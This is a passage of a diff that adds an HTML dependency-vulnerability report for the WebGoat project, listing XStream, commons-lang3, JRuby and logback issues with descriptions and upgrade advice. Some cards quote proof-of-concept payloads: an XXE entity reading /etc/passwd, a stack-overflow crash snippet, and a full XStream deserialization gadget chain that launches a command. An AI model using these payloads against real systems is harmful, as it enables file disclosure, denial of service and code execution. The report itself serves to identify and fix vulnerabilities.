comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.</p><p>Two common types of DoS vulnerabilities:</p><ul><li>High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, <a href="https://security.snyk.io/vuln/SNYK-JAVA-COMMONSFILEUPLOAD-30082" target="_blank" rel="noopener noreferrer">commons-fileupload:commons-fileupload</a>.</li></ul><ul><li>Crash - An attacker sending crafted requests that could cause the system to crash. For Example,  <a href="https://snyk.io/vuln/npm:ws:20171108" target="_blank" rel="noopener noreferrer">npm <code>ws</code> package</a></li></ul><h2>Remediation</h2><p>Upgrade <code>com.thoughtworks.xstream:xstream</code> to version 1.4.19 or higher.</p><h2>References</h2><ul><li><a href="https://github.com/x-stream/xstream/commit/e8e88621ba1c85ac3b8620337dd672e0c0c3a846" target="_blank" rel="noopener noreferrer">GitHub Commit</a></li><li><a href="https://x-stream.github.io/CVE-2021-43859.html" target="_blank" rel="noopener noreferrer">XStream Advisory</a></li></ul></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-2388977" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--high">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">139</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#CE5019">H</div>
+      <h3>XML External Entity (XXE) Injection</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-30385</li>
+      <li class="card-meta-item">CWE-200</li>
+      <li class="card-meta-item">Security</li>
+      <li class="card-meta-item">No Path Found</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> com.thoughtworks.xstream:xstream@1.4.5</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">org.owasp.webgoat:webgoat@2025.4-SNAPSHOT &#x203A; com.thoughtworks.xstream:xstream@1.4.5</div>
+    </div>
+    <div class="issue-summary severity--high">
+      <div class="issue-description"><h2>Overview</h2><p><a href="http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22xstream%22" target="_blank" rel="noopener noreferrer"><code>com.thoughtworks.xstream:xstream</code></a> is a simple library to serialize objects to XML and back again.</p><p>Multiple XML external entity (XXE) vulnerabilities in the (1) Dom4JDriver, (2) DomDriver, (3) JDomDriver, (4) JDom2Driver, (5) SjsxpDriver, (6) StandardStaxDriver, and (7) WstxDriver drivers in XStream before 1.4.9 allow remote attackers to read arbitrary files via a crafted XML document.</p><h2>Details</h2><p>XXE Injection is a type of attack against an application that parses XML input.</p><p>XML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.</p><p>Attacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.</p><p>For example, below is a sample XML document, containing an XML element- username.</p><pre><code>&lt;?xml version=&#34;1.0&#34; encoding=&#34;ISO-8859-1&#34;?&gt;
+   &lt;username&gt;John&lt;/username&gt;
+&lt;/xml&gt;
+</code></pre><p>An external XML entity - <code>xxe</code>, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of  <code>/etc/passwd</code> and display it to the user rendered by <code>username</code>.</p><pre><code>&lt;?xml version=&#34;1.0&#34; encoding=&#34;ISO-8859-1&#34;?&gt;
+&lt;!DOCTYPE foo [
+   &lt;!ENTITY xxe SYSTEM &#34;file:///etc/passwd&#34; &gt;]&gt;
+   &lt;username&gt;&amp;xxe;&lt;/username&gt;
+&lt;/xml&gt;
+</code></pre><p>Other XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.</p><h2>References</h2><ul><li><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3674" target="_blank" rel="noopener noreferrer">NVD</a></li><li><a href="http://www.openwall.com/lists/oss-security/2016/03/28/1" target="_blank" rel="noopener noreferrer">OSS Security</a></li><li><a href="https://github.com/x-stream/xstream/issues/25" target="_blank" rel="noopener noreferrer">GitHub Issue</a></li></ul></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-30385" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--high">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">174</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#CE5019">H</div>
+      <h3>Denial of Service (DoS)</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-31394</li>
+      <li class="card-meta-item">CWE-20</li>
+      <li class="card-meta-item">Security</li>
+      <li class="card-meta-item" style="color:#AB1A1A;font-weight:600">Reachable</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> com.thoughtworks.xstream:xstream@1.4.5</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">org.owasp.webgoat:webgoat@2025.4-SNAPSHOT &#x203A; com.thoughtworks.xstream:xstream@1.4.5</div>
+    </div>
+    <div class="issue-summary severity--high">
+      <div class="issue-description"><h2>Overview</h2><p><a href="https://x-stream.github.io/" target="_blank" rel="noopener noreferrer">com.thoughtworks.xstream:xstream</a> is a simple library to serialize objects to XML and back again.</p><p>Affected versions of this package are vulnerable to Denial of Service (DoS). When a certain denyTypes workaround is not used, mishandles attempts to create an instance of the primitive type &#39;void&#39; during unmarshalling, leading to a remote application crash, as demonstrated by an <code>xstream.fromXML(&#34;&amp;lt;void/&gt;&#34;)</code> call.</p><h2>Details</h2><p>Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.</p><p>Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.</p><p>One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.</p><p>When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.</p><p>Two common types of DoS vulnerabilities:</p><ul><li>High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, <a href="https://security.snyk.io/vuln/SNYK-JAVA-COMMONSFILEUPLOAD-30082" target="_blank" rel="noopener noreferrer">commons-fileupload:commons-fileupload</a>.</li></ul><ul><li>Crash - An attacker sending crafted requests that could cause the system to crash. For Example,  <a href="https://snyk.io/vuln/npm:ws:20171108" target="_blank" rel="noopener noreferrer">npm <code>ws</code> package</a></li></ul><h2>Remediation</h2><p>Upgrade <code>com.thoughtworks.xstream:xstream</code> to version 1.4.10 or higher.</p><h2>References</h2><ul><li><a href="https://github.com/x-stream/xstream/commit/6e546ec366419158b1e393211be6d78ab9604ab" target="_blank" rel="noopener noreferrer">GitHub Commit</a></li><li><a href="https://github.com/x-stream/xstream/commit/8542d02d9ac5d384c85f4b33d6c1888c53bd55d" target="_blank" rel="noopener noreferrer">GitHub Commit</a></li><li><a href="https://github.com/x-stream/xstream/commit/b3570be2f39234e61f99f9a20640756ea71b1b4" target="_blank" rel="noopener noreferrer">GitHub Commit</a></li><li><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-7957" target="_blank" rel="noopener noreferrer">NVD</a></li><li><a href="http://x-stream.github.io/CVE-2017-7957.html" target="_blank" rel="noopener noreferrer">Vendor Advisory</a></li></ul></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-31394" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--high">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">194</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#CE5019">H</div>
+      <h3>Deserialization of Untrusted Data</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-8352924</li>
+      <li class="card-meta-item">CWE-502</li>
+      <li class="card-meta-item">Security</li>
+      <li class="card-meta-item">No Path Found</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> com.thoughtworks.xstream:xstream@1.4.5</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">org.owasp.webgoat:webgoat@2025.4-SNAPSHOT &#x203A; com.thoughtworks.xstream:xstream@1.4.5</div>
+    </div>
+    <div class="issue-summary severity--high">
+      <div class="issue-description"><h2>Overview</h2><p><a href="https://x-stream.github.io/" target="_blank" rel="noopener noreferrer">com.thoughtworks.xstream:xstream</a> is a simple library to serialize objects to XML and back again.</p><p>Affected versions of this package are vulnerable to Deserialization of Untrusted Data due to a manipulated binary input stream. An attacker can terminate the application with a stack overflow error resulting in a denial of service by manipulating the processed input stream when configured to use the <code>BinaryStreamDriver</code>.</p><h2>Workaround</h2><p>This vulnerability can be mitigated by catching the <code>StackOverflowError</code> in the client code calling XStream.</p><h2>PoC</h2><p>Prepare the manipulated data and provide it as input for a XStream instance using the BinaryDriver:</p><pre><code>final byte[] byteArray = new byte[36000];
+for (int i = 0; i &lt; byteArray.length / 4; i++) {
+      byteArray[i * 4] = 10;
+      byteArray[i * 4 + 1] = -127;
+      byteArray[i * 4 + 2] = 0;
+      byteArray[i * 4 + 3] = 0;
+}
+
+XStream xstream = new XStream(new BinaryStreamDriver());
+xstream.fromXML(new ByteArrayInputStream(byteArray));
+</code></pre><p>As soon as the data gets unmarshalled, the endless recursion is entered and the executing thread is aborted with a stack overflow error.</p><h2>Details</h2><p>Serialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.</p><p>_Deserialization of untrusted data_ (<a href="https://cwe.mitre.org/data/definitions/502.html" target="_blank" rel="noopener noreferrer">CWE-502</a>) is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, thus allowing the attacker to control the state or the flow of the execution.</p><h2>Remediation</h2><p>Upgrade <code>com.thoughtworks.xstream:xstream</code> to version 1.4.21 or higher.</p><h2>References</h2><ul><li><a href="https://github.com/x-stream/xstream/commit/bb838ce2269cac47433e31c77b2b236466e9f266" target="_blank" rel="noopener noreferrer">GitHub Commit</a></li><li><a href="https://github.com/x-stream/xstream/commit/fdd9f7d3de0d7ccf2f9979bcd09fbf3e6a0c881a" target="_blank" rel="noopener noreferrer">GitHub Commit</a></li><li><a href="https://x-stream.github.io/CVE-2024-47072.html" target="_blank" rel="noopener noreferrer">XStream Advisory</a></li></ul></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-8352924" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--high">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">172</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#CE5019">H</div>
+      <h3>Uncontrolled Recursion</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">SNYK-JAVA-ORGAPACHECOMMONS-10734078</li>
+      <li class="card-meta-item">CWE-674</li>
+      <li class="card-meta-item">Security</li>
+      <li class="card-meta-item">No Path Found</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> org.apache.commons:commons-lang3@3.14.0</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">org.owasp.webgoat:webgoat@2025.4-SNAPSHOT &#x203A; org.apache.commons:commons-lang3@3.14.0</div>
+    </div>
+    <div class="issue-summary severity--high">
+      <div class="issue-description"><h2>Overview</h2><p>Affected versions of this package are vulnerable to Uncontrolled Recursion via the <code>ClassUtils.getClass</code> function. An attacker can cause the application to terminate unexpectedly by providing excessively long input values.</p><h2>Remediation</h2><p>Upgrade <code>org.apache.commons:commons-lang3</code> to version 3.18.0 or higher.</p><h2>References</h2><ul><li><a href="https://lists.apache.org/thread/bgv0lpswokgol11tloxnjfzdl7yrc1g1" target="_blank" rel="noopener noreferrer">Apache Pony Mail</a></li><li><a href="https://github.com/apache/commons-lang/commit/b424803abdb2bec818e4fbcb251ce031c22aca53" target="_blank" rel="noopener noreferrer">GitHub Commit</a></li></ul></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/SNYK-JAVA-ORGAPACHECOMMONS-10734078" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--high">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">98</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#CE5019">H</div>
+      <h3>Denial of Service (DoS)</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">SNYK-JAVA-ORGJRUBY-10557730</li>
+      <li class="card-meta-item">CWE-400</li>
+      <li class="card-meta-item">Security</li>
+      <li class="card-meta-item">No Path Found</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> org.jruby:jruby-stdlib@10.0.0.1</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">org.owasp.webgoat:webgoat@2025.4-SNAPSHOT &#x203A; org.asciidoctor:asciidoctorj@3.0.0 &#x203A; org.jruby:jruby@10.0.0.1 &#x203A; org.jruby:jruby-stdlib@10.0.0.1</div>
+    </div>
+    <div class="issue-summary severity--high">
+      <div class="issue-description"><h2>Overview</h2><p><a href="https://www.jruby.org/" target="_blank" rel="noopener noreferrer">org.jruby:jruby-stdlib</a> is a JRuby Lib Setup package.</p><p>Affected versions of this package are vulnerable to Denial of Service (DoS) through the <code>response parser</code> which uses <code>Range#to_a</code> to convert the <code>uid-set</code> data into arrays of integers, without limitations on the expanded size of the ranges.</p><h2>Remediation</h2><p>A fix was pushed into the <code>master</code> branch but not yet published.</p><h2>References</h2><ul><li><a href="https://github.com/ruby/net-imap/commit/70e3ddd071a94e450b3238570af482c296380b35" target="_blank" rel="noopener noreferrer">GitHub Commit</a></li><li><a href="https://github.com/ruby/net-imap/commit/c8c5a643739d2669f0c9a6bb9770d0c045fd74a3" target="_blank" rel="noopener noreferrer">GitHub Commit</a></li><li><a href="https://github.com/ruby/net-imap/commit/cb92191b1ddce2d978d01b56a0883b6ecf0b1022" target="_blank" rel="noopener noreferrer">GitHub Commit</a></li></ul></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/SNYK-JAVA-ORGJRUBY-10557730" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--medium">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">41</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#D68000">M</div>
+      <h3>External Initialization of Trusted Variables or Data Stores</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">SNYK-JAVA-CHQOSLOGBACK-13169722</li>
+      <li class="card-meta-item">CWE-454</li>
+      <li class="card-meta-item">Security</li>
+      <li class="card-meta-item">No Path Found</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> ch.qos.logback:logback-core@1.5.18</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">org.owasp.webgoat:webgoat@2025.4-SNAPSHOT &#x203A; org.springframework.boot:spring-boot-starter-validation@3.5.6 &#x203A; org.springframework.boot:spring-boot-starter@3.5.6 &#x203A; org.springframework.boot:spring-boot-starter-logging@3.5.6 &#x203A; ch.qos.logback:logback-classic@1.5.18 &#x203A; ch.qos.logback:logback-core@1.5.18</div>
+    </div>
+    <div class="issue-summary severity--medium">
+      <div class="issue-description"><h2>Overview</h2><p><a href="https://mvnrepository.com/artifact/ch.qos.logback/logback-core" target="_blank" rel="noopener noreferrer">ch.qos.logback:logback-core</a> is a logback-core module.</p><p>Affected versions of this package are vulnerable to External Initialization of Trusted Variables or Data Stores via the conditional processing of the <code>logback.xml</code> configuration file when both the Janino library and Spring Framework are present on the class path. An attacker can execute arbitrary code by compromising an existing configuration file or injecting a malicious environment variable before program execution. This is only exploitable if the attacker has write access to a configuration file or can set a malicious environment variable.</p><h2>Remediation</h2><p>Upgrade <code>ch.qos.logback:logback-core</code> to version 1.5.19 or higher.</p><h2>References</h2><ul><li><a href="https://github.com/qos-ch/logback/commit/61f6a2544f36b3016e0efd434ee21f19269f1df7" target="_blank" rel="noopener noreferrer">GitHub Commit</a></li><li><a href="https://logback.qos.ch/news.html#1.5.19" target="_blank" rel="noopener noreferrer">Release Notes</a></li></ul></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/SNYK-JAVA-CHQOSLOGBACK-13169722" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--medium">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">429</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#D68000">M</div>
+      <h3>Arbitrary File Deletion</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1051966</li>
+      <li class="card-meta-item">CWE-22</li>
+      <li class="card-meta-item">Security</li>
+      <li class="card-meta-item" style="color:#AB1A1A;font-weight:600">Reachable</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> com.thoughtworks.xstream:xstream@1.4.5</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">org.owasp.webgoat:webgoat@2025.4-SNAPSHOT &#x203A; com.thoughtworks.xstream:xstream@1.4.5</div>
+    </div>
+    <div class="issue-summary severity--medium">
+      <div class="issue-description"><h2>Overview</h2><p><a href="https://x-stream.github.io/" target="_blank" rel="noopener noreferrer">com.thoughtworks.xstream:xstream</a> is a simple library to serialize objects to XML and back again.</p><p>Affected versions of this package are vulnerable to Arbitrary File Deletion. A remote attacker can delete arbitrary known files on the host as long as the executing process has sufficient rights, by manipulating the processed input stream.</p><h2>Remediation</h2><p>Upgrade <code>com.thoughtworks.xstream:xstream</code> to version 1.4.15 or higher.</p><h2>References</h2><ul><li><a href="https://x-stream.github.io/CVE-2020-26259.html" target="_blank" rel="noopener noreferrer">CVE-2020-26259 Details</a></li><li><a href="https://github.com/x-stream/xstream/security/advisories/GHSA-jfvx-7wrx-43fh" target="_blank" rel="noopener noreferrer">GitHub Advisory</a></li><li><a href="https://github.com/x-stream/xstream/commit/0bcbf50126a62dfcd65f93a0da0c6d1ae92aa738" target="_blank" rel="noopener noreferrer">GitHub Commit</a></li><li><a href="https://github.com/jas502n/CVE-2020-26259" target="_blank" rel="noopener noreferrer">PoC in GitHub</a></li></ul></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1051966" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--medium">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">559</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#D68000">M</div>
+      <h3>Server-Side Request Forgery (SSRF)</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1051967</li>
+      <li class="card-meta-item">CWE-918</li>
+      <li class="card-meta-item">Security</li>
+      <li class="card-meta-item" style="color:#AB1A1A;font-weight:600">Reachable</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> com.thoughtworks.xstream:xstream@1.4.5</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">org.owasp.webgoat:webgoat@2025.4-SNAPSHOT &#x203A; com.thoughtworks.xstream:xstream@1.4.5</div>
+    </div>
+    <div class="issue-summary severity--medium">
+      <div class="issue-description"><h2>Overview</h2><p><a href="https://x-stream.github.io/" target="_blank" rel="noopener noreferrer">com.thoughtworks.xstream:xstream</a> is a simple library to serialize objects to XML and back again.</p><p>Affected versions of this package are vulnerable to Server-Side Request Forgery (SSRF). A remote attacker can request data from internal resources that are not publicly available by manipulating the processed input stream.</p><p>*Note:* This vulnerability does not exist running Java 15 or higher, and is only relevant when using <code>XStream</code>&#39;s default blacklist.</p><h2>Remediation</h2><p>Upgrade <code>com.thoughtworks.xstream:xstream</code> to version 1.4.15 or higher.</p><h2>References</h2><ul><li><a href="https://github.com/Al1ex/CVE-2020-26258" target="_blank" rel="noopener noreferrer">Exploit Repo</a></li><li><a href="https://github.com/x-stream/xstream/commit/6740c04b217aef02d44fba26402b35e0f6f493ce" target="_blank" rel="noopener noreferrer">GitHub Commit</a></li><li><a href="https://x-stream.github.io/CVE-2020-26258.html" target="_blank" rel="noopener noreferrer">XStream Advisory</a></li><li><a href="https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2020/CVE-2020-26258.yaml" target="_blank" rel="noopener noreferrer">Nuclei Templates</a></li></ul></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1051967" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--medium">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">334</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#D68000">M</div>
+      <h3>Deserialization of Untrusted Data</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1088328</li>
+      <li class="card-meta-item">CWE-502</li>
+      <li class="card-meta-item">Security</li>
+      <li class="card-meta-item">No Path Found</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> com.thoughtworks.xstream:xstream@1.4.5</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">org.owasp.webgoat:webgoat@2025.4-SNAPSHOT &#x203A; com.thoughtworks.xstream:xstream@1.4.5</div>
+    </div>
+    <div class="issue-summary severity--medium">
+      <div class="issue-description"><h2>Overview</h2><p><a href="https://x-stream.github.io/" target="_blank" rel="noopener noreferrer">com.thoughtworks.xstream:xstream</a> is a simple library to serialize objects to XML and back again.</p><p>Affected versions of this package are vulnerable to Deserialization of Untrusted Data. There is a vulnerability which may allow a remote attacker who has sufficient rights to execute local commands on the host only by manipulating the processed input stream.</p><h3>PoC</h3><pre><code>&lt;java.util.PriorityQueue serialization=&#39;custom&#39;&gt;
+  &lt;unserializable-parents/&gt;
+  &lt;java.util.PriorityQueue&gt;
+    &lt;default&gt;
+      &lt;size&gt;2&lt;/size&gt;
+      &lt;comparator class=&#39;sun.awt.datatransfer.DataTransferer$IndexOrderComparator&#39;&gt;
+        &lt;indexMap class=&#39;com.sun.xml.internal.ws.client.ResponseContext&#39;&gt;
+          &lt;packet&gt;
+            &lt;message class=&#39;com.sun.xml.internal.ws.encoding.xml.XMLMessage$XMLMultiPart&#39;&gt;
+              &lt;dataSource class=&#39;com.sun.xml.internal.ws.message.JAXBAttachment&#39;&gt;
+                &lt;bridge class=&#39;com.sun.xml.internal.ws.db.glassfish.BridgeWrapper&#39;&gt;
+                  &lt;bridge class=&#39;com.sun.xml.internal.bind.v2.runtime.BridgeImpl&#39;&gt;
+                    &lt;bi class=&#39;com.sun.xml.internal.bind.v2.runtime.ClassBeanInfoImpl&#39;&gt;
+                      &lt;jaxbType&gt;com.sun.corba.se.impl.activation.ServerTableEntry&lt;/jaxbType&gt;
+                      &lt;uriProperties/&gt;
+                      &lt;attributeProperties/&gt;
+                      &lt;inheritedAttWildcard class=&#39;com.sun.xml.internal.bind.v2.runtime.reflect.Accessor$GetterSetterReflection&#39;&gt;
+                        &lt;getter&gt;
+                          &lt;class&gt;com.sun.corba.se.impl.activation.ServerTableEntry&lt;/class&gt;
+                          &lt;name&gt;verify&lt;/name&gt;
+                          &lt;parameter-types/&gt;
+                        &lt;/getter&gt;
+                      &lt;/inheritedAttWildcard&gt;
+                    &lt;/bi&gt;
+                    &lt;tagName/&gt;
+                    &lt;context&gt;
+                      &lt;marshallerPool class=&#39;com.sun.xml.internal.bind.v2.runtime.JAXBContextImpl$1&#39;&gt;
+                        &lt;outer-class reference=&#39;../..&#39;/&gt;
+                      &lt;/marshallerPool&gt;
+                      &lt;nameList&gt;
+                        &lt;nsUriCannotBeDefaulted&gt;
+                          &lt;boolean&gt;true&lt;/boolean&gt;
+                        &lt;/nsUriCannotBeDefaulted&gt;
+                        &lt;namespaceURIs&gt;
+                          &lt;string&gt;1&lt;/string&gt;
+                        &lt;/namespaceURIs&gt;
+                        &lt;localNames&gt;
+                          &lt;string&gt;UTF-8&lt;/string&gt;
+                        &lt;/localNames&gt;
+                      &lt;/nameList&gt;
+                    &lt;/context&gt;
+                  &lt;/bridge&gt;
+                &lt;/bridge&gt;
+                &lt;jaxbObject class=&#39;com.sun.corba.se.impl.activation.com.sun.corba.se.impl.activation.ServerTableEntry&#39;&gt;
+                  &lt;activationCmd&gt;calc&lt;/activationCmd&gt;
+                &lt;/jaxbObject&gt;
+              &lt;/dataSource&gt;
+            &lt;/message&gt;
+            &lt;satellites/&gt;
+            &lt;invocationProperties/&gt;
+          &lt;/packet&gt;
+        &lt;/indexMap&gt;
+      &lt;/comparator&gt;
+    &lt;/default&gt;
+    &lt;int&gt;3&lt;/int&gt;
+    &lt;string&gt;javax.xml.ws.binding.attachments.inbound&lt;/string&gt;
+    &lt;string&gt;javax.xml.ws.binding.attachments.inbound&lt;/string&gt;
+  &lt;/java.util.PriorityQueue&gt;
+&lt;/java.util.PriorityQueue&gt;
+</code></pre><p>Users who follow <a href="https://x-stream.github.io/security.html#workaround" target="_blank" rel="noopener noreferrer">the recommendation</a> to setup XStream&#39;s security framework with a whitelist limited to the minimal required types are not affected.</p><h2>Details</h2><p>Serialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.</p><p>_Deserialization of untrusted data_ (<a href="https://cwe.mitre.org/data/definitions/502.html" target="_blank" rel="noopener noreferrer">CWE-502</a>), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.</p><p>Java deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a <a href="https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078" target="_blank" rel="noopener noreferrer">popular library (Apache Commons Collection)</a>. These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.</p><p>An attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.</p><p>&gt; Developers put too much trust in Java Object Serialization. Some even de</p></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1088328" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--medium">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">196</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#D68000">M</div>
+      <h3>Deserialization of Untrusted Data</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1088329</li>
+      <li class="card-meta-item">CWE-502</li>
+      <li class="card-meta-item">Security</li>
+      <li class="card-meta-item">No Path Found</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> com.thoughtworks.xstream:xstream@1.4.5</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
